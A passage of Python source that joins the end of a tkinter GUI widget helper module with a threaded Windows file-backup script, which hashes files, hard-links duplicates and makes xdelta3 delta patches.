"""Starts the threaded process and displays the GUI."""
self.start()
self.mainloop()
def process(self, func):
"""Wrapper/decorator for app processes."""
def wrapper(*args, **kwargs):
thread_tasks([lambda: func()], self.spinner)
#with Spinner():
# return func()
return wrapper
class Popup(BaseApp):
"""Wrapper object for tkMessageBox."""
def __init__(self, title="", message=""):
"""A popup window that is displayed using .show_ methods."""
BaseApp.__init__(self, title)
# Hide the root window
self.withdraw()
self.name = title
self.message = message
self.input = ""
def show_ok_cancel(self):
"""Display a popup with 'OK' and 'Cancel'. Returns True or False."""
self.input = tkMessageBox.askokcancel(self.name, self.message)
return
def show_yes_no(self, cancel=False):
"""Display a popup with 'Yes', 'No', and optionally 'Cancel'.
Returns True, False, or None."""
if cancel:
self.input = tkMessageBox.askyesnocancel(self.name, self.message)
return
self.input = tkMessageBox.askyesno(self.name, self.message)
return
def show_info(self):
"""Display an info popup with 'OK' button. Returns 'ok'."""
self.input = tkMessageBox.showinfo(self.name, self.message)
return
def show_warn(self):
"""Display a warning popup with 'OK' button. Returns 'ok'."""
self.input = tkMessageBox.showwarning(self.name, self.message)
return
def show_error(self):
"""Display an error popup with 'OK' button. Returns 'ok'."""
self.input = tkMessageBox.showerror(self.name, self.message)
return
def file_dialog(self, extensions=["*.*"], filetypes=["All files"]):
"""Opens file browser and returns selection as input."""
options = dict(defaultextension=extensions[0],
filetypes=zip(filetypes, extensions))
result = tkFileDialog.askopenfilenames(parent=self, **options)
self.input = result
return result
# =============================================================================
# MENUBAR
class Menubar(tk.Menu):
"""A menubar of menus for the top of app windows (e.g. File, Help, etc)."""
def __init__(self, parent=None):
tk.Menu.__init__(self)
self.parent = parent
self.name = "menubar"
# Set the underlying app's menu to self (this Menubar object)
try:
self.parent.config(menu=self)
except:
pass
self.menus = OrderedDict()
def set_parent(self, parent):
self.parent = parent
self.parent.config(menu=self)
return
def quit(self):
"""Alias for the parent's close() method."""
self.parent.close()
def add_menu(self, name, underline=0):
menu = Menu(self)
self.add_cascade(label=name, underline=underline, menu=menu)
self.menus[name] = menu
return
def add_action(self, menu, name, action):
"""Adds an action to a specified menu."""
self.menus[menu].add_action(name, action)
return
def add_submenu(self, menu, name):
"""Adds an action to a specified menu."""
self.menus[menu].add_submenu(name)
return
class Menu(tk.Menu):
"""A menu object to place in the menubar."""
def __init__(self, parent):
tk.Menu.__init__(self, parent, tearoff=False)
self.items = OrderedDict()
def add_action(self, name, action):
"""Adds an action to the current menu."""
if not action:
action = NULL_ACTION
# Handle new apps as actions
if hasattr(action, "mainloop"):
action = action.mainloop
self.items.update({name: action})
self.add_command(label=name, command=action)
return
def add_submenu(self, name, underline=0):
"""Adds an action to the current menu."""
menu = Menu(self)
self.add_cascade(label=name, underline=underline, menu=menu)
self.items[name] = menu
return
# =============================================================================
# ENTRYBOX
class StatusBar(ttk.Frame):
def __init__(self, root, left="", left_alt="",
right="Ready.", right_alt="Working...",
relief="sunken"):
"""Frame at bottom of root with labels at left and right."""
self.root = root
self.left = left
self.left_alt = left_alt
self.right = right
self.right_alt = right_alt
ttk.Frame.__init__(self, root, relief=relief)
# Place frame into root (at bottom)
self.pack(side='bottom', anchor='s', fill='x',
expand='yes', padx=1, pady=1)
# Place left label
self.left_label = ttk.Label(self, text=self.left)
self.left_label.pack(side="left", anchor="sw", padx=2, pady=2)
# Place right label
self.right_label = ttk.Label(self, text=self.right)
self.right_label.pack(side="right", anchor="sw", padx=2, pady=2)
def reset(self):
self.left_label.config(text=self.left)
self.right_label.config(text=self.right)
self.root.update()
return
def process(self, func):
def wrapper(*args, **kwargs):
with self:
return func(*args, **kwargs)
return wrapper
def __enter__(self):
self.left_label.config(text=self.left_alt)
self.right_label.config(text=self.right_alt)
self.root.update()
def __exit__(self, exc_type, exc_val, exc_tb):
self.reset()
# =============================================================================
# ENTRYBOX
class EntryBox(ttk.LabelFrame):
def __init__(self, root, label, button_label, button_action, # TODO: size
default_text="", clear_text=True, relief="ridge"):
"""Entry and action button in LabelFrame.
Args:
root: parent app object
label (str): text to display on LabelFrame
button_label (str): text to display on Button
button_action (func): function that does something with input str
default_text (str): text to show in Entry
clear_text (bool): clear the box after button action (default True)
relief (str): LabelFrame's relief type
"""
ttk.LabelFrame.__init__(self, root, relief=relief, text=label)
self.button_action = button_action
self.root = root
self.button_label = button_label
self.clear_text = clear_text
self.button = ttk.Button(self, text=self.button_label,
width=len(self.button_label)+1)
#self.set_command(self.cmd)
self.button.pack(side="right", anchor="sw", padx=2, pady=4)
self.entry = ttk.Entry(self)
self.entry.pack(side="left", anchor="s", fill="x", expand="yes",
padx=2, pady=4)
self.entry.insert(0, default_text)
# Set action
self.button.config(command=self.__call__)
self.pack()
def get_value(self):
return self.entry.get()
# TODO: does this work well?
def __call__(self):
result = self.button_action(self.get_value())
self.clear()
return result
#def set_command(self, func):
# #self.button.config(command=lambda: func(self.get_value()))
# self.button.config(command=self.cmd)
# return
def clear(self):
self.entry.delete(0, 9999999)
return
# =============================================================================
# STATUSBAR
'''
class Statusbar(tk.Frame):
"""Places status bar and label in frame."""
def __init__(self, root, disable_button=None):
tk.Frame.__init__(self, root)
self.root = root
self.status_thread = ThreadedClient("Statusbar", self.start_bar)
self.wait_event = threading.Event()
self.root_but = disable_button
# Status (label)
self.labels = ["Ready", "Working...", "Done"]
self.cur_status = 0
# Statusbar container
self.bar = ttk.Frame(root, relief='raised')
self.bar.pack(side='bottom', anchor='s', fill='x',
expand='yes', padx=0, pady=0)
# Status labels
self.status_label = ttk.Label(self.bar, text=self.labels[0])
self.status_label.pack(side='left', anchor='sw', padx=2, pady=5)
# Progress bar
self.progressbar = ttk.Progressbar(self.bar, orient='horizontal',
length=200, mode='indeterminate')
# Reset button
self.reset_but = tk.Button(self.bar, text="Reset", command=self.reset)
self.reset_but.config(relief='flat',
overrelief="groove",
height=0)
def reset(self):
"""Resets the status bar."""
self.root_but.config(state="enabled")
self.progressbar.pack_forget()
self.update_bar()
self.status_thread = ThreadedClient("Statusbar", self.start_bar)
self.wait_event = threading.Event()
self.reset_but.pack_forget()
def update_bar(self):
"""Changes status label and packs/unpacks progress bar."""
self.cur_status += 1
if self.cur_status > 2:
self.cur_status = 0
self.status_label.config(text=self.labels[self.cur_status])
if self.cur_status == 1:
self.progressbar.pack(side='right', expand='y',
fill='x', padx=5, pady=2)
elif self.cur_status == 2:
self.reset_but.pack(side='right')
# self.progressbar.pack_forget() # Issue here
def start_bar(self):
"""Controls the bar."""
self.root_but.config(state='disabled')
self.progressbar.start(1)
self.wait_event.wait()
logging.debug("Status wait event done")
self.progressbar.stop()
logging.debug("Bar stopped")
def start(self):
"""Starts the status thread."""
self.update_bar()
self.status_thread.start()
def stop(self):
"""Stops the bar at the event flag."""
self.wait_event.set()
self.update_bar()
'''
'''
class _App(tk.Frame):
"""Testing GUI"""
def __init__(self, root):
# Parent window properties
tk.Frame.__init__(self, root)
self.root = root
self.root.title("Statusbar Testing App")
self.root.geometry('160x100')
""" Testing Variables """
self.Main_val = 5
""" Widgets """
# OK Button runs Main() and sends parameters (from tk widgets)
self.Ok_but = ttk.Button(text=" OK ",
command=self.call_main)
self.Ok_but.pack()
# Imported StatusBar will be used as so
self.statusbar = Statusbar(self, self.Ok_but)
""" Bindings """
# Allows user to press "Enter" instead of clicking the OK button
self.root.bind('<Return>', self.call_main)
# Allows user to press "Escape" instead of clicking the Close button
self.root.bind('<Escape>', self.close)
""" Window Methods """
def close(self, event=None):
self.root.destroy()
""" Main Method(s) """
def call_main(self, event=None):
"""Threadifies Main() and passes parameters to it."""
self.main_thread = apptools.ThreadedClient(
"Main", lambda: self.Main(self.Main_val))
self.main_thread.start()
def Main(self, t):
"""Emulates process."""
logging.debug('Processing...')
self.statusbar.start()
sleep(t)
logging.debug('Processing Complete')
self.statusbar.stop() # Should also hide/pack_forget the prog bar
'''
'''
if __name__ == '__main__':
apptools.thread_GUI(_App)
'''
# =============================================================================
# RADIOBOX
class Radiobox(ttk.LabelFrame):
"""Allows user to easily place radio buttions into a labelframe."""
def __init__(self, root, var_type, labelframe_text, box_side,
box_anchor, box_fill, box_expand, r_alignment='horizontal'):
# Container
self.Container = ttk.LabelFrame(root, text=labelframe_text)
self.Container.pack(fill=box_fill, expand=box_expand, side=box_side,
anchor=box_anchor, padx=5, pady=5)
# Default radiobutton value
if var_type == "string" or var_type == "str":
self.radio_value = tk.StringVar()
else:
self.radio_value = tk.IntVar()
# Alignment method for radio buttons ('horizontal' or 'vertical')
# What if the user wants a grid of radio buttons?
# N x N or max_row / max_col?
# alignment_methods = {0: 'horizontal', 1: 'vertical'}
self.button_alignment = r_alignment
self.r_column = 0
self.r_row = 0
def add_button(self, radio_name, in_value):
"""Adds a new button to the radiobox."""
rbutton = ttk.Radiobutton(self.Container, text=radio_name,
value=in_value, variable=self.radio_value)
rbutton.grid(column=self.r_column, row=self.r_row)
if self.button_alignment == 'horizontal':
self.r_column += 1
else:
self.r_row += 1
def get(self):
"""Returns the value of the selected radiobutton."""
return self.radio_value.get()
def _print_selected(self):
"""For Testing"""
print self.radio_value.get()
'''
class _App(tk.Frame):
"""Testing GUI"""
def __init__(self, root):
""" Parent window properties """
tk.Frame.__init__(self, root)
self.root = root
self.root.title("Radiobox Test App")
""" Widgets """
self.radiobox = Radiobox(self, 'str', " Radios ", 'top',
'nw', 'both', 'yes', 1)
self.radiobox.add_button('Option 1', 'One')
self.radiobox.add_button('Option 2', 'Two')
self.radiobox.add_button('Option 3', 'Three')
self.Ok_but = ttk.Button(text=" Print ",
command=self.radiobox._print_selected)
self.Ok_but.pack(side='bottom')
'''
'''
if __name__ == '__main__':
apptools.thread_GUI(_App)
'''
# =============================================================================
# FILETREE
class FileTree(ttk.LabelFrame): # TODO: Consider "ListTree" as name
"""Allows user to easily manipulate columns of data."""
def __init__(self, root):
self.root = root
# Vars
self.fileList = []
# Container
self.container = ttk.LabelFrame(root, text=' Tabel Label ')
self.container.pack(side='top', anchor='n', fill='x',
expand='yes', padx=5, pady=5)
self.headers = "Col 1"
# Tree
self.tree = ttk.Treeview(self.container, show="headings", height=5)
self.tree["columns"] = "single"
self.tree.column("single", width=200)
self.tree.heading("single", text="Input Files")
self.tree.pack(fill='x')
# Duplicate Warning
self.warning = ttk.Label(self.container,
text="Warning:\nDuplicates will be removed")
# Add button - adds table contents
self.Add_but = ttk.Button(self.container, text='Add',
command=self.add_file)
self.Add_but.pack(side='left')
# Remove button - removes selected table contents
self.Remove_but = ttk.Button(self.container, text='Remove',
command=self.rm_file)
self.Remove_but.pack(side='right')
# Default filetypes
self.FILEOPENOPTIONS = dict(defaultextension='*.*',
filetypes=[('All files', '*.*')])
def set_filetypes(self, default_ext, types_tupelist):
self.FILEOPENOPTIONS = None
self.FILEOPENOPTIONS = dict(defaultextension=default_ext,
filetypes=types_tupelist)
def add_file(self):
"""Opens file browser and places selected file(s) in tree."""
new_file = tkFileDialog.askopenfilenames(parent=self.root,
**self.FILEOPENOPTIONS)
print(new_file)
for f in new_file:
self.fileList.append(f)
self.tree.insert("", 'end', values=f)
if len(self.fileList) != len(set(self.fileList)):
self.warning.pack(side='bottom')
def rm_file(self):
"""Removes selected file from tree."""
current_val = self.tree.item(self.tree.focus())['values'][0]
self.tree.delete(self.tree.focus())
self.fileList.remove(current_val)
# Attempts to remove duplicate warning
if len(self.fileList) == len(set(self.fileList)):
self.warning.pack_forget()
def get_list(self):
"""Returns selected list of selected files."""
self.fileList = list(set(self.fileList))
print(self.fileList)
return self.fileList
'''
class _App(tk.Frame):
"""Testing GUI"""
def __init__(self, root):
tk.Frame.__init__(self, root)
self.filetree = FileTree(self)
self.Ok_but = ttk.Button(text=" Pass ",
command=self.filetree.get_list)
self.Ok_but.pack(side='bottom')
'''
'''
if __name__ == '__main__':
apptools.thread_GUI(_App)
'''
# =============================================================================
# BROWSEFILE
class BrowseFile(ttk.LabelFrame):
"""Select a file(s) and add it to an entrybox"""
def __init__(self, root=None):
self.root = root
self.name = "browsefile"
# Input Frame
self.Container = ttk.LabelFrame(root, text=" Select File ")
self.Container.pack(side='top', anchor='n', fill='x',
expand='yes', padx=5, pady=5)
# Default filetypes
self.FILEOPENOPTIONS = dict(defaultextension='*.*',
filetypes=[('All files', '*.*')])
# Browse Entry
self.fileVar = tk.StringVar()
self.fileEntry = ttk.Entry(self.Container, width=30)
self.fileEntry.pack(side='left', anchor='nw', fill='x',
expand='yes', padx=5, pady=5)
# TODO: Copy/paste
# Browse Button
try:
# Use the folder icon
self.opengif = tk.PhotoImage(file=OPENFOLDER)
self.browseBut = ttk.Button(self.Container,
command=self._browse)
self.browseBut.config(image=self.opengif)
except:
# Use an elipse
self.browseBut = ttk.Button(self.Container,
text=" ... ",
command=self._browse)
self.browseBut.pack(side='right', anchor='ne',
padx=5, pady=5)
def set_parent(self, parent):
self.root = parent
def set_filetypes(self, default_ext, types_tupelist):
self.FILEOPENOPTIONS = None
self.FILEOPENOPTIONS = dict(defaultextension=default_ext,
filetypes=types_tupelist)
def _browse(self):
"""Opens file browser and places selected file in entry."""
browse_file = tkFileDialog.askopenfilenames(
parent=self.root, **self.FILEOPENOPTIONS)
# Place in entry box
# TODO: parent_dir = path.dirname(browse_file)
self.fileEntry.delete(0, 'end')
self.fileEntry.insert(0, browse_file)
self.fileVar.set(browse_file)
# TODO: return browse_file, parent_dir
def get(self):
return self.fileVar.get()
class BrowseDir(ttk.LabelFrame):
"""Select a directory and add it to an entrybox."""
def __init__(self, root):
self.root = root
# Input Frame
self.Container = ttk.LabelFrame(root,
text=" Select Directory ")
self.Container.pack(side='top', anchor='n', fill='x',
expand='yes', padx=5, pady=5)
# Browse Entry
self.fileVar = tk.StringVar()
self.fileEntry = ttk.Entry(self.Container, width=30)
self.fileEntry.pack(side='left', anchor='nw', fill='x',
expand='yes', padx=5, pady=5)
# Browse Button
try:
# Use the folder icon
self.opengif = tk.PhotoImage(file=OPENFOLDER)
self.browseBut = ttk.Button(self.Container, command=self._browse)
self.browseBut.config(image=self.opengif)
except:
# Use an elipse
self.browseBut = ttk.Button(self.Container, text=" ... ",
command=self._browse)
self.browseBut.pack(side='right', anchor='ne', padx=5, pady=5)
def _browse(self):
"""Opens file browser and places selected dir in entry."""
browse_file = tkFileDialog.askdirectory(parent=self.root)
self.fileEntry.delete(0, 'end')
self.fileEntry.insert(0, browse_file)
self.fileVar.set(browse_file)
def get(self):
return self.fileVar.get()
'''
class _App(tk.Frame):
"""Testing GUI"""
def __init__(self, root):
tk.Frame.__init__(self, root)
self.browse_ent = BrowseFile(self)
self.browse_ent.set_filetypes('.py',
[('Python', '.pyw'),
('Python', '.py')])
self.browse_dir = BrowseDir(self)
'''
'''
if __name__ == '__main__':
apptools.thread_GUI(_App)
'''
# =============================================================================
# PROGRESSES
# TODO: move to own package with statusbar -- renamed to progressbar
# TODO: create new status bar object from frame
import itertools
#class _Progress(threading.Thread, tk.Label):
class _Progress(tk.Label):
def __init__(self, root, speed=.25, side="right",
anchor="se", padx=2, pady=2):
tk.Label.__init__(self, root, text="")
self.speed = speed
self.side = side
self.anchor = anchor
self.padx = padx
self.pady = pady
self.cycle = []
self._stop = threading.Event()
setattr(root, "spinner", self)
#try:
# root.add_command("start_spinner", self.run)
# root.add_command("stop_spinner", self.run)
#except AttributeError:
# root.root.add_command("start_spinner", self.run)
# root.root.add_command("stop_spinner", self.run)
def run(self, event=None, tasks=[]):
"""Executes the progress bar as a thread."""
#self._stop.clear()
self.pack(side=self.side, anchor=self.anchor,
padx=self.padx, pady=self.pady)
while not self._stop.is_set():
self.config(text=self.cycle.next())
self.update()
time.sleep(self.speed)
self.pack_forget()
def stop(self, event=None):
"""Stops the progress bar."""
time.sleep(1)
self._stop.set()
return
'''
def __enter__(self):
print("Spinner Started.")
self.run()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
print("Spinner Stopped.")
'''
class Spinner(_Progress):
def __init__(self, root, side="right", anchor="se", padx=2, pady=2):
_Progress.__init__(self, root)
#self.pack(side=side, anchor=anchor, padx=padx, pady=pady)
self.cycle = itertools.cycle(["|", "/", "--", "\\"])
class Bouncer(_Progress):
def __init__(self, root, side="right", anchor="se", padx=2, pady=2):
_Progress.__init__(self, root)
#self.pack(side=side, anchor=anchor, padx=padx, pady=pady)
self.cycle = itertools.cycle(
["[* ]", "[ * ]", "[ * ]", "[ * ]",
"[ *]", "[ * ]", "[ * ]", "[ * ]"])
class Elipse(_Progress):
def __init__(self, root, word="", side="right",
anchor="se", padx=2, pady=2):
_Progress.__init__(self, root)
#self.pack(side=side, anchor=anchor, padx=padx, pady=pady)
elipses = [" ", ". ", ".. ", "..."]
self.cycle = itertools.cycle(
["[{}{}]".format(word, e) for e in elipses])
'''
app = ThreadedApp("Spinner")
#spinner = Spinner(app)
spinner = Bouncer(app)
#spinner = Elipse(app, word="")
app.add_command("stop_spinner", spinner.stop)
app.add_command("start_spinner", spinner.run)
app.add_button("Start", app.start_spinner)
app.add_button("Stop", app.stop_spinner)
app.mainloop()
'''
if __name__ == "__main__":
# Logging output
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s')
# Sources:
# https://stackoverflow.com/questions/4297949/image-on-a-button
# https://stackoverflow.com/questions/11352278/default-file-type-in-tkfiledialogs-askopenfilename-method
|
backup.py
|
import hashlib
import csv
import os
from datetime import date
import shutil
import glob
import win32api
import win32con
import win32file
import sys
import yaml
import argparse
import subprocess
import time
import threading
import queue
import typing
import pywintypes
import zipfile
class FileInfo:
def __init__(self, path=None, hash_val=None, stat_info=None, csv_row=None):
if csv_row:
self.path = csv_row[0]
self.hash_val = csv_row[1]
self.size = int(csv_row[2])
self.mtime_ns = int(csv_row[3])
self.ctime_ns = int(csv_row[4])
else:
if path and hash_val and stat_info:
self.path = path
self.hash_val = hash_val
self.size = stat_info.st_size
self.mtime_ns = stat_info.st_mtime_ns
self.ctime_ns = stat_info.st_ctime_ns
else:
raise ValueError
def make_csv_row(self):
return [self.path, self.hash_val, self.size, self.mtime_ns, self.ctime_ns]
def has_stat_changed(self, stat_info):
return (self.size != stat_info.st_size or
self.mtime_ns != stat_info.st_mtime_ns or
self.ctime_ns != stat_info.st_ctime_ns)
log_lock = threading.Lock()
def log_msg(*args):
with log_lock:
print(time.strftime('%H:%M:%S '), threading.get_ident(), ' ', *args, flush=True)
def hash_file(file_path):
""" return hash of given file"""
alg = hashlib.sha1()
f = open(file_path, 'rb')
size = 16 * 1024 * 1024
buf = f.read(size)
while len(buf) > 0:
alg.update(buf)
buf = f.read(size)
f.close()
return alg.hexdigest()
def run_threaded(func, args):
thread_count = 16
threads = []
for i in range(thread_count):
thread = (threading.Thread(target=func, args=args))
threads.append(thread)
thread.start()
queue_param = None
# Multiple parameters for a tuple
if isinstance(args, tuple) and len(args) > 0 and isinstance(args[0], queue.Queue):
while not args[0].empty() and threads[0].is_alive():
log_msg('Run threaded: queue size {}'.format(args[0].qsize()))
threads[0].join(300)
for thread in threads:
thread.join()
def check_file_info_worker(work_q: queue.Queue, file_infos: typing.List[FileInfo], removal_q: queue.Queue,
addition_q: queue.Queue, always_check_hash: bool):
while True:
try:
index = work_q.get_nowait()
except queue.Empty:
return
try:
sr = os.stat(file_infos[index].path)
stat_changed = file_infos[index].has_stat_changed(sr)
if stat_changed or always_check_hash:
hash_val = hash_file(file_infos[index].path)
if stat_changed or (hash_val != file_infos[index].hash_val):
if hash_val != file_infos[index].hash_val:
log_msg('Hash changed: {}'.format(file_infos[index].path))
else:
log_msg('Mismatch file info: {}'.format(file_infos[index].path))
removal_q.put(index)
addition_q.put(FileInfo(file_infos[index].path, hash_val, sr))
except OSError:
log_msg('File deleted: {}'.format(file_infos[index].path))
removal_q.put(index)
work_q.task_done()
def check_file_info(file_infos, always_check_hash):
work_queue = queue.Queue()
removal_q = queue.Queue()
addition_q = queue.Queue()
for i in range(len(file_infos)):
work_queue.put(i)
log_msg('check_file_info, work size: {}'.format(len(file_infos)))
run_threaded(check_file_info_worker, (work_queue, file_infos, removal_q, addition_q, always_check_hash))
removals = []
while not removal_q.empty():
removals.append(removal_q.get_nowait())
removals.sort(reverse = True)
for i in removals:
file_infos.pop(i)
while not addition_q.empty():
file_infos.append(addition_q.get_nowait())
def check_file_info_exists(file_infos):
removals = []
for i in range(len(file_infos)):
try:
if not os.path.exists(file_infos[i].path):
log_msg('File deleted: {}'.format(file_infos[i].path))
removals.append(i)
except OSError:
removals.append(i)
removals.reverse()
for i in removals:
file_infos.pop(i)
def populate_file_infos(file_infos, file_name):
try:
csvfile = open(file_name, 'r', newline='')
reader = csv.reader(csvfile)
for row in reader:
file_infos.append(FileInfo(csv_row=row))
csvfile.close()
except OSError as error:
log_msg('Error reading csv: {}, {}', format(file_name, str(error)))
def populate_hash_dict(hash_dict, file_name, check_hashes):
file_infos = []
populate_file_infos(file_infos, file_name)
check_file_info(file_infos, check_hashes)
for info in file_infos:
hash_dict[info.hash_val] = info
def populate_name_dict(name_dict, file_name, check_existence):
file_infos = []
populate_file_infos(file_infos, file_name)
if check_existence:
check_file_info_exists(file_infos)
for info in file_infos:
name_dict[info.path] = info
def write_file_infos(info_dict, file_name):
csvfile = open(file_name, 'w', newline='')
writer = csv.writer(csvfile)
for info in info_dict.values():
writer.writerow(info.make_csv_row())
csvfile.close()
def dest_path_from_source_path(backup_dir, source_path):
drive, path = os.path.splitdrive(source_path)
# Trim trailing ':' from drive
if len(drive) > 1:
drive = drive[:-1]
else:
drive = ''
path = path[1:]
# join ignores empty elements, so it's OK if drive is empty
return os.path.join(backup_dir, drive, path)
def generate_delta_files(backup_dir, delta_files):
file_size = 0
file_count = 0
for source in delta_files:
target_name = dest_path_from_source_path(backup_dir, source)
# test if we can read the source file. File is possibly open and not available for backup
try:
test_file = open(source, 'rb')
test_file.close()
available = True
except OSError:
log_msg('File {} is not available. Skipping.'.format(source))
available = False
if available and len(backup_dir) > 4:
os.makedirs(os.path.split(target_name)[0], exist_ok=True)
# look for previous backups from which to make a delta
# last two characters of backup_dir should be day. Replace them with '?'
search_path = backup_dir[:-2] + '??'
bdirs = glob.glob(search_path)
full_backup = None
for bdir in bdirs:
check_path = dest_path_from_source_path(bdir, source)
if os.path.exists(check_path):
# only use non-empty files as a source
# this avoids using an empty file as the base if there was an error copying the file
sr = os.stat(check_path)
if sr.st_size > 0:
full_backup = check_path
break
if full_backup:
log_msg('Full backup found: {}. Generating delta.'.format(full_backup))
target_name = target_name + '.patch'
log_msg('Calling xdelta3 full={}, source={}, target={}'.format(full_backup, source, target_name))
subprocess.call(['xdelta3.exe', '-e', '-B', '1000000000', '-W', '16777216', '-s', full_backup, source,
target_name])
else:
log_msg('Copying source: {}.'.format(source))
shutil.copy2(source, target_name)
stat_result = os.stat(target_name)
file_count += 1
file_size += stat_result.st_size
win32api.SetFileAttributes(target_name, win32con.FILE_ATTRIBUTE_READONLY)
return file_count, file_size
def generate_compressed_files(backup_dir, source_files):
file_size = 0
file_count = 0
for source in source_files:
target_name = dest_path_from_source_path(backup_dir, source + '.zip')
# test if we can read the source file. File is possibly open and not available for backup
try:
test_file = open(source, 'rb')
test_file.close()
available = True
except OSError:
log_msg('File {} is not available. Skipping.'.format(source))
available = False
if available:
os.makedirs(os.path.split(target_name)[0], exist_ok=True)
log_msg('compressing file {}.'.format(source))
zip = zipfile.ZipFile(target_name, "w", zipfile.ZIP_DEFLATED)
zip.write(source)
zip.close()
stat_result = os.stat(target_name)
file_count += 1
file_size += stat_result.st_size
win32api.SetFileAttributes(target_name, win32con.FILE_ATTRIBUTE_READONLY)
return file_count, file_size
def backup_worker(source_queue: queue.Queue, backup_dir: str, hash_sources, hash_source_lock: threading.Lock,
always_hash_source: bool, hash_targets, hash_target_lock: threading.Lock, per_hash_locks, results_queue: queue.Queue):
linked_files = 0
linked_size = 0
new_bytes = 0
new_files = 0
while True:
try:
file_path = source_queue.get_nowait()
except queue.Empty:
results_queue.put( (linked_files, linked_size, new_bytes, new_files) )
return
try:
attributes = win32api.GetFileAttributes(file_path)
# skip dehydrated files
# win32con does not define FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS 0x400000
# or FILE_ATTRIBUTE_RECALL_ON_OPEN 0x40000
if (attributes & win32con.FILE_ATTRIBUTE_OFFLINE) == 0 and \
(attributes & 0x400000) == 0 and \
(attributes & 0x40000) == 0:
sr = os.stat(file_path)
info = None
if not always_hash_source:
with hash_source_lock:
if file_path in hash_sources:
info = hash_sources[file_path]
if info and not info.has_stat_changed(sr):
hash_val = info.hash_val
else:
if not always_hash_source:
log_msg('Hashing {}'.format(file_path))
hash_val = hash_file(file_path)
hash_sources[file_path] = FileInfo(file_path, hash_val, sr)
dest_path = dest_path_from_source_path(backup_dir, file_path)
use_copy = True
target_val = None
hash_lock = None
# It's possible for two threads to be working on files with the same hash.
# This is undesirable because we will miss hard linking opportunities.
# Create a lock per unique hash so only one thread can be copying/linking a hash at any one time.
with hash_target_lock:
if hash_val in per_hash_locks:
hash_lock = per_hash_locks[hash_val]
else:
hash_lock = threading.Lock()
per_hash_locks[hash_val] = hash_lock
if hash_lock:
hash_lock.acquire()
with hash_target_lock:
if hash_val in hash_targets:
target_val = hash_targets[hash_val]
if target_val:
# make link
try:
os.link(target_val.path, dest_path)
linked_files += 1
linked_size += sr.st_size
use_copy = False
except OSError:
pass
if use_copy:
# copy new file
log_msg('new file {}'.format(file_path))
shutil.copy2(file_path, dest_path)
win32api.SetFileAttributes(dest_path, win32con.FILE_ATTRIBUTE_READONLY)
sr = os.stat(dest_path)
new_bytes += sr.st_size
new_files += 1
with hash_target_lock:
hash_targets[hash_val] = FileInfo(dest_path, hash_val, sr)
if hash_lock:
hash_lock.release()
else:
log_msg('Skipping dehydrated file {}'.format(file_path))
except OSError as error:
log_msg('Exception handling file {}, {}'.format(file_path, str(error)))
source_queue.task_done()
def do_backup(backup_dir, sources, dest_hash_csv, source_hash_csv, latest_only_dirs, skip_files, always_hash_source,
always_hash_target):
"""
:param backup_dir: str: destination directory for backup
:param sources: list of source paths. All sub dirs are included
:param dest_hash_csv: csv file with hashes on destination volume
:param source_hash_csv: csv file with hashes on source volume
:param latest_only_dirs: list of directories from which only the single latest file is saved
:param skip_files: list of full paths that should be skipped (e.g. already captured via binary delta)
:param always_hash_source: bool: if true, always hashes source file, withot checking size or timestamps
:param always_hash_target: bool: if true, rehashes files on dest volume to verify hashes
:return:
"""
hash_targets = {}
hash_sources = {}
log_msg('Loading dest hashes. Always hash target: {}'.format(always_hash_target))
populate_hash_dict(hash_targets, dest_hash_csv, always_hash_target)
log_msg('Load source hashes. Always hash source: {}'.format(always_hash_source))
populate_name_dict(hash_sources, source_hash_csv, always_hash_source)
new_bytes = 0
log_msg('Executing backup')
log_msg('Skip files: {}'.format(skip_files))
new_files = 0
linked_files = 0
linked_size = 0
source_queue = queue.Queue()
for source_dir in sources:
for (dpath, dnames, fnames) in os.walk(source_dir):
dest_dir = dest_path_from_source_path(backup_dir, dpath)
os.makedirs(dest_dir, exist_ok=True)
if dpath in latest_only_dirs:
lastest_time = 0
file_selected = []
for file_name in fnames:
sr = os.stat(os.path.join(dpath, file_name))
if sr.st_mtime_ns > lastest_time:
lastest_time = sr.st_mtime_ns
file_selected = [file_name]
fnames = file_selected
for file_name in fnames:
file_path = os.path.join(dpath, file_name)
if file_path not in skip_files:
source_queue.put(file_path)
source_lock = threading.Lock()
target_lock = threading.Lock()
results = queue.Queue()
per_hash_locks = {}
log_msg('do_backup, work size: {}'.format(source_queue.qsize()))
run_threaded(backup_worker, (source_queue, backup_dir, hash_sources, source_lock, always_hash_source, hash_targets,
target_lock, per_hash_locks, results))
while not results.empty():
lf, ls, ns, nf = results.get_nowait()
linked_files += lf
linked_size += ls
new_bytes += ns
new_files += nf
write_file_infos(hash_targets, dest_hash_csv)
write_file_infos(hash_sources, source_hash_csv)
for hash_name in [dest_hash_csv, source_hash_csv]:
hash_dest_path = dest_path_from_source_path(backup_dir, hash_name)
# it's possible the file was already included in the backup. Don't copy over if so.
if not os.path.exists(hash_dest_path):
dir_path = os.path.split(hash_dest_path)[0]
os.makedirs(dir_path, exist_ok=True)
shutil.copy2(hash_name, hash_dest_path)
log_msg('Link count: {:,}, linked size: {:,}'.format(linked_files, linked_size))
log_msg('Total files: {:,}, total size: {:,}'.format(linked_files+new_files, linked_size+new_bytes))
return new_files, new_bytes
# returns a list of hardlinks for the given path, excluding the original path
def get_hardlinks(path):
drive, no_drive_path = os.path.splitdrive(path)
hardlinks = []
temp_names = win32file.FindFileNames(path)
# the response from win32file.FindFileNames needs some fixup
# We need to add the drive letter and remove the trailing NUL
for t_name in temp_names:
fixed_name = t_name[:-1]
# don't include the original path
if fixed_name != no_drive_path:
hardlinks.append(drive + fixed_name)
return hardlinks
def remove_tree_worker(delete_queue, root):
while True:
try:
file_path = delete_queue.get_nowait()
except queue.Empty:
return
exterior_path = None
paths_to_delete = [file_path]
hard_links = get_hardlinks(file_path)
for link in hard_links:
if link.startswith(root):
paths_to_delete.append(link)
else:
exterior_path = link
if not exterior_path:
log_msg('Deleting file: {}'.format(file_path))
try:
win32api.SetFileAttributes(file_path, win32con.FILE_ATTRIBUTE_NORMAL)
for path in paths_to_delete:
os.remove(path)
except OSError as error:
log_msg('Exception removing file {}, {}'.format(file_path, str(error)))
except pywintypes.error as pyw_error:
log_msg('Exception removing file {}, {}'.format(file_path, str(pyw_error)))
if len(hard_links) > 0:
try:
win32api.SetFileAttributes(hard_links[-1], win32con.FILE_ATTRIBUTE_READONLY)
except OSError:
pass
except pywintypes.error:
pass
delete_queue.task_done()
def walk_tree_worker(walk_queue, delete_queue, file_ids, id_lock):
while True:
try:
file_path = walk_queue.get_nowait()
except queue.Empty:
return
